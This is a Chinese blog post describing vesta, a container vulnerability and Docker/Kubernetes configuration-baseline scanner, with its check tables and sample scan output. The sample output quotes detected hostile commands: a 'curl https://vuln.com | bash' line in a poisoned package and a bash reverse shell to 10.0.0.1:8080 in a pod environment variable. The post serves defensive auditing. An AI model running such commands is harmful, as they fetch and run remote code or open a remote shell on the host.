Docker和Kubernetes配置安全基线检查工具vesta
nanshan 2025-05-08 03:52 25 浏览 0 评论
概述
vesta是一款集容器扫描,Docker和Kubernetes配置基线检查于一身的工具。检查内容包括镜像或容器中包含漏洞版本的组件,同时根据云上实战渗透经验检查Docker以及Kubernetes的危险配置
vesta同时也是一个灵活,方便的工具,能够在各种系统上运行,包括但不限于Windows,Linux以及MacOS
检查项
Scan
- 扫描通过主流安装方法安装程序的漏洞
- apt/apt-get
- rpm
- yum
- dpkg
- 扫描软件依赖的漏洞以及恶意投毒的依赖包
- Java(Jar, War, 以及主流依赖log4j)
- NodeJs(NPM, YARN)
- Python(Wheel, Poetry)
- Golang(Go binary)
- PHP(Composer, 以及主流的PHP框架: laravel, thinkphp, wordpress, wordpress插件等)
- Rust(Rust binary)
Docker检查
Supported | Check Item | Description | Severity | Reference |
PrivilegeAllowed | 危险的特权模式 | critical | Ref | |
Capabilities | 危险capabilities被设置 | critical | Ref | |
Volume Mount | 敏感或危险目录被挂载 | critical | Ref | |
Docker Unauthorized | 2375端口打开并且未授权 | critical | Ref | |
Kernel version | 当前内核版本存在逃逸漏洞 | critical | Ref | |
Network Module | Net模式为 host 模式或同时在特定containerd版本下 | critical/medium | ||
Pid Module | Pid模式被设置为 host | high | ||
Docker Server version | Docker Server版本存在漏洞 | critical/high/ medium/low | ||
Docker env password check | Docker env是否存在弱密码 | high/medium | ||
Docker history | Docker layers 存在不安全的命令 | high/medium | ||
Docker Backdoor | Docker env command 存在恶意命令 | critical/high | ||
Docker Swarm | Docker Swarm存在危险配置信息以及危险的容器检测 | medium/low |
Kubernetes检查
Supported | Check Item | Description | Severity | Reference |
PrivilegeAllowed | 危险的特权模式 | critical | Ref | |
Capabilities | 危险capabilities被设置 | critical | Ref | |
PV and PVC | PV 被挂载到敏感目录并且状态为active | critical/medium | Ref | |
RBAC | K8s 权限存在危险配置 | high/medium/ low/warning | ||
Kubernetes-dashborad | 检查 -enable-skip-login 以及 dashborad的账户权限 | critical/high/ low | Ref | |
Kernel version | 当前内核版本存在逃逸漏洞 | critical | Ref | |
Docker Server version (k8s versions is less than v1.24) | Docker Server版本存在漏洞 | critical/high/ medium/low | ||
Kubernetes certification expiration | 证书到期时间小于30天 | medium | ||
ConfigMap and Secret check | ConfigMap 或者 Secret是否存在弱密码 | high/medium | ||
PodSecurityPolicy check (k8s version under the v1.25) | PodSecurityPolicy过度容忍Pod不安全配置 | high/medium/low | Ref | |
Auto Mount ServiceAccount Token | Pod默认挂载了service token | critical/high/ medium/low | Ref | |
NoResourceLimits | 没有限制资源的使用,例如CPU,Memory, 存储 | low | Ref | |
Job and Cronjob | Job或CronJob没有设置seccomp或seLinux安全策略 | low | Ref | |
Envoy admin | Envoy admin被配置以及监听 0.0.0.0 . | high/medium | Ref | |
Cilium version | Cilium 存在漏洞版本 | critical/high/ medium/low | Ref | |
Istio configurations | Istio 存在漏洞版本以及安全配置检查 | critical/high/ medium/low | Ref | |
Kubelet 10255/10250 and Kubectl proxy | 存在node打开了10250或者10255并且未授权或 Kubectl proxy开启 | high/medium/ low | ||
Etcd configuration | Etcd 安全配置检查 | high/medium | ||
Sidecar configurations | Sidecar 安全配置检查以及Env环境检查 | critical/high/ medium/low | ||
Pod annotation | Pod annotation 存在不安全配置 | high/medium/ low/warning | Ref | |
DaemonSet | DaemonSet存在不安全配置 | critical/high/ medium/low | ||
Backdoor | 检查k8s中是否有后门 | critical/high | Ref | |
Lateral admin movement | Pod被特意配置到Master节点中 | medium/low |
编译并使用vesta
编译vesta
- 使用make build 进行编译
- 从Releases上下载可执行文件
使用vesta检查镜像过容器中的漏洞组件版本(使用镜像ID,镜像标签或使用-f文件输入均可)
$./vesta scan container -f example.tar
2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer
Detected 216 vulnerabilities
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. If |
| | | | | | | django.utils.text.Truncator's |
| | | | | | | chars() and words() methods |
| | | | | | | were passed the html=True |
| | | | | | | argument, t ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. |
| | | | | | | Due to the behaviour of |
| | | | | | | the underlying HTMLParser, |
| | | | | | | django.utils.html.strip_tags |
| | | | | | | would be extremely ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in |
| | | | | | | Django 1.11.x before 1.11.23, |
| | | | | | | 2.1.x before 2.1.11, and 2.2.x |
| | | | | | | before 2.2.4. Due to an error |
| | | | | | | in shallow key transformation, |
| | | | | | | key and index lookups for |
| | | | | | | django.contrib.postgres.f ... |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in |
| | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', |
| | | | | | | malicious command "curl https://vuln.com | bash" are |
| | | | | | | detected. |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+使用vesta检查Docker的基线配置
也可以在docker中使用
make run.docker$./vesta analyze docker
2022/11/29 23:06:32 Start analysing
Detected 3 vulnerabilities
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: None | | | | the CVE-2022-0492 with |
| | | | | | CAP_SYS_ADMIN and v1 |
| | | | | | architecture of cgroups |
| | | | | | vulnerablility, has a |
| | | | | | potential container escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 3 | Name: Image Tag | Privileged | true | critical | There has a potential container|
| | ID: None | | | | escape in privileged module. |
| | | | | | |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found |
| | ID: None | | vesta_history_test:latest | | | in command: ' echo |
| | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > |
| | | | | | config.ini # buildkit'. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+使用vesta检查Kubernetes的基线配置
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version
Detected 4 vulnerabilities
Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential |
| | default | Status: Running | | Privileged | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has |
| | | env | | | | found weak password: |
| | | | | | | 'Password123456'. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds |
| | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: |
| | | | | | | 0.91 out of 1.0), which is a |
| | | | | | | suspect command backdoor. |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential |
| | default | Status: Running | | capabilities | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account |
| | | automountServiceAccountToken | | | | and key permission are |
| | | | | | | given, which will cause a |
| | | | | | | potential container escape. |
| | | | | | | Reference clsuterRolebind: |
| | | | | | | vuln-clusterrolebinding | |
| | | | | | | roleBinding: vuln-rolebinding |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. |
| | | Resource | | | | |
| | | | | | | |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | | | | | the CVE-2022-0185 with |
| | | | | | CAP_SYS_ADMIN vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key |
| | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the |
| | | rolename: vuln-clusterrole | | pods, services | | default service account, which |
| | | kind: ClusterRole | subject | | | will cause a potential data |
| | | kind: Group | subject name: | | | leakage. |
| | | system:serviceaccounts:vuln | | | | |
| | | namespace: vuln | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key |
| | | | rolename: vuln-role | role | create, update | resources: | | resources given to the |
| | | kind: Role | subject kind: | pods, services | | default service account, which |
| | | ServiceAccount | subject name: | | | will cause a potential data |
| | | default | namespace: default | | | leakage. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given |
| | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', |
| | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. |
| | | subject kind: User | subject | | | |
| | | name: testUser | namespace: | | | |
| | | all | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+使用方法
$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
Tutorial is available at https://github.com/kvesta/vesta
Usage:
vesta [command]
Available Commands:
analyze Kubernetes analyze
completion Generate the autocompletion script for the specified shell
help Help about any command
scan Container scan
update Update vulnerability database
version Print version information and quit
Flags:
-h, --help help for vesta项目地址:
https://github.com/kvesta/vesta/
相关推荐
- 使用nginx配置域名及禁止直接通过IP访问网站
-
前段时间刚搭建好这个网站,一直没有关注一个问题,那就是IP地址也可以访问我的网站,今天就专门研究了一下nginx配置问题,争取把这个问题研究透彻。1.nginx配置域名及禁止直接通过IP访问先来看n...
- 如何在 Linux 中使用 PID 号查找进程名称?
-
在Linux的复杂世界中,进程是系统运行的核心,每个进程都由一个唯一的「进程ID」(PID)标识。无论是系统管理员在排查失控进程,还是开发者在调试应用程序,知道如何将PID映射到对应的进程名称都是一项...
- Linux服务器硬件信息查询与日常运维命令总结
-
1.服务器硬件信息查询1.1CPU信息查询命令功能描述示例lscpu显示CPU架构、核心数、线程数等lscpucat/proc/cpuinfo详细CPU信息(型号、缓存、频率)cat/proc/c...
- Ubuntu 操作系统常用命令详解(ubuntu常用的50个命令)
-
UbuntuLinux是一款流行的开源操作系统,广泛应用于服务器、开发、学习等场景。命令行是Ubuntu的灵魂,也是高效、稳定管理系统的利器。本文按照各大常用领域,详细总结Ubuntu必学...
- 从 0 到 1:打造基于 Linux 的私有 API 网关平台
-
在当今微服务架构盛行的时代,API网关作为服务入口和安全屏障,其重要性日益凸显。你是否想过,不依赖商业方案,完全基于开源组件,在Linux上构建一个属于自己的私有API网关平台?今天就带你...
- Nginx搭建简单直播服务器(nginx 直播服务器搭建)
-
前言使用Nginx+Nginx-rtmp-module在Ubuntu中搭建简单的rtmp推流直播服务器。服务器环境Ubuntu16.04相关概念RTMP:RTMP协议是RealTi...
- Linux连不上网?远程卡?这篇网络管理指南你不能错过!
-
大家好!今天咱们聊个所有Linux用户都躲不开的“老大难”——网络管理。我猜你肯定遇到过这些崩溃时刻:新装的Linux系统连不上Wi-Fi,急得直拍桌子;远程服务器SSH连不上,提示“Connecti...
- 7天从0到上线!手把手教你用Python Flask打造爆款Web服务
-
一、为什么全网开发者都在疯学Flask?在当今Web开发的战场,Flask就像一把“瑞士军刀”——轻量级架构让新手3天速成,灵活扩展能力又能支撑百万级用户项目!对比Django的“重型装甲”,Flas...
- nginx配置文件详解(nginx反向代理配置详解)
-
Nginx是一个强大的免费开源的HTTP服务器和反向代理服务器。在Web开发项目中,nginx常用作为静态文件服务器处理静态文件,并负责将动态请求转发至应用服务器(如Django,Flask,et...
- 30 分钟搞定 Docker 安装与 Nginx 部署,轻松搭建高效 Web 服务
-
在云计算时代,利用容器技术快速部署应用已成为开发者必备技能。本文将手把手教你在阿里云轻量应用服务器上,通过Docker高效部署Nginx并发布静态网站,全程可视化操作,新手也能轻松上手!一、准...
- Nginx 配置实战:从摸鱼到部署,手把手教你搞定生产级配置
-
各位摸鱼搭子们!今天咱不聊代码里的NullPointerException,改聊点「摸鱼必备生存技能」——Nginx配置!先灵魂拷问一下:写了一堆接口却不会部署?服务器被恶意请求打崩过?静态资源加载...
- 如何使用 Daphne + Nginx + supervisor部署 Django
-
前言:从Django3.0开始支持ASGI应用程序运行,使Django完全具有异步功能。Django目前已经更新到5.0,对异步支持也越来越好。但是,异步功能将仅对在ASGI下运行的应用程序可用...
- Docker命令最全详解(39个最常用命令)
-
Docker是云原生的核心,也是大厂的必备技能,下面我就全面来详解Docker核心命令@mikechen本文作者:陈睿|mikechen文章来源:mikechen.cc一、Docker基本命令doc...
- ubuntu中如何查看是否已经安装了nginx
-
在Ubuntu系统中,可以通过以下几种方法检查是否已安装Nginx:方法1:使用dpkg命令(适用于Debian/Ubuntu)bashdpkg-l|grepnginx输出...
- OVN 概念与实践(德育概念的泛化在理论和实践中有什么弊端?)
-
今天我们来讲解OVN的概念和基础实践,要理解本篇博客的内容,需要前置学习:Linux网络设备-Bridge&VethPairLinux网络设备-Bridge详解OVS+Fa...
欢迎 你 发表评论:
- 一周热门
-
-
UOS服务器操作系统防火墙设置(uos20关闭防火墙)
-
极空间如何无损移机,新Z4 Pro又有哪些升级?极空间Z4 Pro深度体验
-
手机如何设置与显示准确时间的详细指南
-
NAS:DS video/DS file/DS photo等群晖移动端APP远程访问的教程
-
如何在安装前及安装后修改黑群晖的Mac地址和Sn系列号
-
如何修复用户配置文件服务在 WINDOWS 上登录失败的问题
-
一加手机与电脑互传文件的便捷方法FileDash
-
日本海上自卫队的军衔制度(日本海上自卫队的军衔制度是什么)
-
10个免费文件中转服务站,分享文件简单方便,你知道几个?
-
爱折腾的特斯拉车主必看!手把手教你TESLAMATE的备份和恢复
-
- 最近发表
-
- 使用nginx配置域名及禁止直接通过IP访问网站
- 如何在 Linux 中使用 PID 号查找进程名称?
- Linux服务器硬件信息查询与日常运维命令总结
- Ubuntu 操作系统常用命令详解(ubuntu常用的50个命令)
- 从 0 到 1:打造基于 Linux 的私有 API 网关平台
- Nginx搭建简单直播服务器(nginx 直播服务器搭建)
- Linux连不上网?远程卡?这篇网络管理指南你不能错过!
- 7天从0到上线!手把手教你用Python Flask打造爆款Web服务
- nginx配置文件详解(nginx反向代理配置详解)
- 30 分钟搞定 Docker 安装与 Nginx 部署,轻松搭建高效 Web 服务
- 标签列表
-
- linux 查询端口号 (58)
- docker映射容器目录到宿主机 (66)
- 杀端口 (60)
- yum更换阿里源 (62)
- internet explorer 增强的安全配置已启用 (65)
- linux自动挂载 (56)
- 禁用selinux (55)
- sysv-rc-conf (69)
- ubuntu防火墙状态查看 (64)
- windows server 2022激活密钥 (56)
- 无法与服务器建立安全连接是什么意思 (74)
- 443/80端口被占用怎么解决 (56)
- ping无法访问目标主机怎么解决 (58)
- fdatasync (59)
- 405 not allowed (56)
- 免备案虚拟主机zxhost (55)
- linux根据pid查看进程 (60)
- dhcp工具 (62)
- mysql 1045 (57)
- 宝塔远程工具 (56)
- ssh服务器拒绝了密码 请再试一次 (56)
- ubuntu卸载docker (56)
- linux查看nginx状态 (63)
- tomcat 乱码 (76)
- 2008r2激活序列号 (65)